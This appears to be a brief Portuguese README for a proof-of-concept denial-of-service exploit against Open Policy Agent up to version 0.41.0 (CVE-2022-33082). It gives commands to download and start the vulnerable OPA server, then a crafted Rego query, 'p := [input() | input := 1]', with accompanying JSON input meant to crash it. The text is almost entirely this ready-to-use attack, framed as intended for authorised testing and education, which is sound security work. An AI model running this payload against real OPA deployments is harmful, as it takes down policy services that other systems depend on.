
Exploit de prova de conceito para CVE-2022-33082 causando negação de serviço no Open Policy Agent versões ≤0.41.0 através de entrada manipulada. Destinado a testes autorizados e uso educacional.
curl -L -o opa https://openpolicyagent.org/downloads/v0.41.0/opa_linux_amd64_static
chmod +x opa
./opa run --server
campo de consulta (código Go):
p := [input() | input := 1]
{ "input":"coloque isto no campo input (json)!" }